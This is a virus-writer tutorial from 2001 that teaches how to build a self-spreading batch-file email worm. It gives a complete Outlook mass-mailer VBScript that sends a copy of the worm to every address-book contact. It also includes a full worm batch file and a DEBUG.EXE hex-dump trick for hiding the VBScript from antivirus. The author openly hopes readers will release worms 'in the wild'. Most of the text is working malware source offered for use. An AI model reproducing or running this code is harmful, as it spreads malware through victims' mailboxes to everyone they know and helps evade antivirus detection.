When the going gets weird the weird turn pro
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
Strange Article - Adding mass mailer vbscript code to a batch file by Alco paul
This is my first time to write a tutorial.. It's lame but I hope you still read it..
I've searched the web for some batch worms and found only one that made a headline, the BAT/911 worm..
I've searched the net for batch worm source code capable of attaching itself in email messages and found "none" :( ..
looking at the bat archive of metaphase vx group only broke my heart (I saw only batch IRC worms and file infectors)..
I pondered..
Clock ticks and alas :)
I think here's why..
***************************************
c:\>v.bat
@echo off
ctty nul
echo on error resume next > c:\vvv.vbs <-----------*Problem*
echo < Mass Mail code > >> c:\vvv.vbs
start c:\vvv.vbs
***************************************
When you execute the code above, it'll spawn vvv.vbs and pops an error msg
"Syntax Error"
Let us examine the spawned vvv.vbs:
*******************
c:\>type c:\vvv.vbs
ON
< Mass Mail code >
*******************
Question: Why didn't I get what I wanna get?
Answer: Coz ON is a parameter of echo.
*****************************************************************
C:\>echo/?
Displays messages, or turns command-echoing on or off.
ECHO [ON | OFF]
ECHO [message]
Type ECHO without parameters to display the current echo setting.
*****************************************************************
To further demonstrate the problem, go to msdos prompt, type echo on error resume next press enter and this is what you'll get..
c:\>echo on error resume next
ON
vvv.vbs won't run coz ON is not a valid vbs command..
And for a mass mailer vbscript to run smoothly, it must contain On Error Resume Next in the beginning of the code..
I speculate that this problem is the reason why most batch file vxers abandoned the email attachment idea and settled for IRC script.ini DCC send.
**********************************************
*Mass mailer VBScript Code.vbs (generic)
on error resume next
dim a,b,c,d,e
set a = Wscript.CreateObject("Wscript.Shell")
set b = CreateObject("Outlook.Application")
set c = b.GetNameSpace("MAPI")
for y = 1 To c.AddressLists.Count
set d = c.AddressLists(y)
x = 1
set e = b.CreateItem(0)
for o = 1 To d.AddressEntries.Count
f = d.AddressEntries(x)
e.Recipients.Add f
x = x + 1
next
e.Subject = "your subject"
e.Body = "your body"
e.Attachments.Add ("worm attachment.bat")
e.DeleteAfterSubmit = True
e.Send
f = ""
next
**********************************************
Solution to the problem, a dot..
Yeah, a fuckin' dot.
Here's a demo..
***************************************
c:\>v.bat
@echo off
ctty nul
echo.on error resume next > c:\vvv.vbs <-----------*no problemo*
echo < Mass Mail code > >> c:\vvv.vbs
start c:\vvv.vbs
***************************************
Execute v.bat you'll get no error msgs.. :)
examine c:\vvv.vbs
*********************
c:\>type c:\vvv.vbs
on error resume next
< Mass Mail code >
*********************
For further demo, go to msdos prompt, type echo.on error resume next and this is what you'll get..
c:\>echo.on error resume next
on error resume next
{!} Because of the dot, now ECHO doesn't consider ON as it's parameter.. :)
That solves the problem..
Now we're on our way to make a simple batch file worm using the GENERIC mass mailer vbscript code...
*****************************************************************
c:\>copy con file.bat
@echo off
copy %0 c:\batch.bat
echo.on error resume next > c:\X.vbs
echo dim a,b,c,d,e >> c:\X.vbs
echo set a = Wscript.CreateObject("Wscript.Shell") >> c:\X.vbs
echo set b = CreateObject("Outlook.Application") >> c:\X.vbs
echo set c = b.GetNameSpace("MAPI") >> c:\X.vbs
echo for y = 1 To c.AddressLists.Count >> c:\X.vbs
echo set d = c.AddressLists(y) >> c:\X.vbs
echo x = 1 >> c:\X.vbs
echo set e = b.CreateItem(0) >> c:\X.vbs
echo for o = 1 To d.AddressEntries.Count >> c:\X.vbs
echo f = d.AddressEntries(x) >> c:\X.vbs
echo e.Recipients.Add f >> c:\X.vbs
echo x = x + 1 >> c:\X.vbs
echo next >> c:\X.vbs
echo e.Subject = "Hello!" >> c:\X.vbs
echo e.Body = "Here's a fuckin' lame batch file worm" >> c:\X.vbs
echo e.Attachments.Add ("c:\batch.bat") >> c:\X.vbs
echo e.DeleteAfterSubmit = False >> c:\X.vbs
echo e.Send >> c:\X.vbs
echo f = "" >> c:\X.vbs
echo next >> c:\X.vbs
start c:\X.vbs
exit
^Z
*****************************************************************
The drawback of this technique is that av will see our batchfile worm as "New VBS" or generic "VBS"..
---------------------------------------------------------------------
Another way of adding vbscript routines to your batch file is by using DEBUG.EXE...
I've adored Debug.exe since the good old Dos days coz it can assemble small .COM programs...
I didn't have an access to TASM (until last month.. poor me :( )
so I experimented with the debug, assembling programs which can destroy track 0 of diskettes, altering command.com to display "Starting MS-DOS" again and again, and other lame things..
Memories, memories, memories.. Hah, enough with the nostalgia...
Today, debug.exe is used by many virii and worms to drop mostly binary executables, sounds, images..
Good news coz this'll be another way for our batch file worm to drop a vbs mailer.. :)
It'll be cooler coz av won't be able to see our batch file worm as a "New VBS"..
Demo:
*******************************
c:\>type ourvbs.vbs
on error resume next
b = "Add my code to your batch"
MsgBox b
*******************************
We want to add code above in our batch file which will later be spawned as .vbs
the process..
Go to MS-DOS prompt
********************
c:\>debug ourvbs.vbs
-
********************
First thing we'll do is to get the size of ourvbs.vbs. type RCX, enter then enter..
*********************
c:\>debug ourvbs.vbs
-rcx
< enter >
CX 003F
:
< enter >
-
*********************
CX 003F means that the size of the ourvbs.vbs is 003FH (hexadecimal) or 63 bytes.
Computers always use hexadecimal (and binary) numbers in expressing numeric quantities.
Now is not the right time to explain to you deeply what a hexadecimal number is...
Consult an encyclopaedia..
Next, press d and enter...
************************************************************************************
c:\>debug ourvbs.vbs
-rcx
CX 003F
:
< enter >
-d
< enter >
158E:0100 6F 6E 20 65 72 72 6F 72-20 72 65 73 75 6D 65 20 on error resume
158E:0110 6E 65 78 74 0D 0A 62 20-3D 20 22 41 64 64 20 6D next..b = "Add m
158E:0120 79 20 63 6F 64 65 20 74-6F 20 79 6F 75 72 20 62 y code to your b
158E:0130 61 74 63 68 22 0D 0A 4D-73 67 42 6F 78 20 62 66 atch"..MsgBox bf
158E:0140 CF 32 E4 A3 9E 03 1F B8-01 2E CD 21 33 ED BE 0B .2.........!3...
158E:0150 00 81 C6 23 D8 8B 74 09-B3 2B BF 7B D4 E8 45 0B ...#..t..+.{..E.
158E:0160 F6 C7 01 75 F5 09 2E 89-CF F7 C5 04 00 75 0C 80 ...u.........u..
158E:0170 3E 83 CF 00 74 05 C6 06-A7 D7 08 56 BE 7B D4 E8 >...t......V.{..
-
************************************************************************************
Whoa.. What the hell was that? It's the hex dump of ourvbs.vbs.. Bit complicated?
Don't worry, we'll just concern ourselves with the pairs of numbers, the 6F, 6E etc..
These numbers represent the characters. Look at the right of the dump..
We can see the VBscript code that we want..
Mission:
Our goal is to get the vbscript code from this hex dump..
Step 1. Add 100 to RCX.. In this case 0100 + 003F = 013F..
Step 2. The sum will make us decide what to get and what to discard...
0100 to sum will be considered.. In this case, 0100 to 013F..
*****************************************************************************************************
Where the heck is 13F?
158E:0130 61 74 63 68 22 0D 0A 4D - 73 67 42 6F 78 20 62 66 <----013F
130 131 132 133 134 135 136 137 138 139 13A 13B 13C 13D 13E 13F
*****************************************************************************************************
Step 3. Copy and paste..
******************************************************************
0100 6F 6E 20 65 72 72 6F 72-20 72 65 73 75 6D 65 20
0110 6E 65 78 74 0D 0A 62 20-3D 20 22 41 34 00 7D 15
0120 79 20 63 6F 64 65 20 74-6F 20 79 6F 75 72 20 62
0130 61 74 63 68 22 0D 0A 4D-73 67 42 6F 78 20 62 66 <----copy 0100 to 013F. discard 0140 above
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
0140 CF 32 E4 A3 9E 03 1F B8-01 2E CD 21 33 ED BE 0B discard
0150 00 81 C6 23 D8 8B 74 09-B3 2B BF 7B D4 E8 45 0B discard
0160 F6 C7 01 75 F5 09 2E 89-CF F7 C5 04 00 75 0C 80 discard
0170 3E 83 CF 00 74 05 C6 06-A7 D7 08 56 BE 7B D4 E8 discard
******************************************************************
Add selected dump to our batch file with additional add-ons..
It's important to remove dashes between dumps.
******************************************************************
c:\>copy con ourbatch.bat
@echo off
echo.e 0100 6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 20>our
echo.e 0110 6E 65 78 74 0D 0A 62 20 3D 20 22 41 64 64 20 6D>>our
echo.e 0120 79 20 63 6F 64 65 20 74 6F 20 79 6F 75 72 20 62>>our
echo.e 0130 61 74 63 68 22 0D 0A 4D 73 67 42 6F 78 20 62 66>>our
******************************************************************
We need to add this to complete the process:
******************************************************************
echo.rcx>>our
echo.[size of the vbscript code]>>our
echo.n[name].vbs>>our
echo.w>>our
echo.q>>our
debug < our
start [name].vbs
******************************************************************
Whalla! Simple ei..
******************************************************************
c:\>copy con ourbatch.bat
@echo off
echo.e 0100 6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 20>our
echo.e 0110 6E 65 78 74 0D 0A 62 20 3D 20 22 41 64 64 20 6D>>our
echo.e 0120 79 20 63 6F 64 65 20 74 6F 20 79 6F 75 72 20 62>>our
echo.e 0130 61 74 63 68 22 0D 0A 4D 73 67 42 6F 78 20 62 66>>our
echo.rcx>>our
echo.003F>>our
echo.nourvbs.vbs>>our
echo.w>>our
echo.q>>our
debug < our
start ourvbs.vbs
^Z
******************************************************************
When ourbatch.bat is run, a message box will pop out..
"Add my code to your batch"..
Now I'm sure you'll be able to add a vbs mailer to your batch file worm using this technique.....
So that's all.. I hope to see your batch worms in the wild.. :)
Alcopaul
12/19/2001
Bugs found? Email me.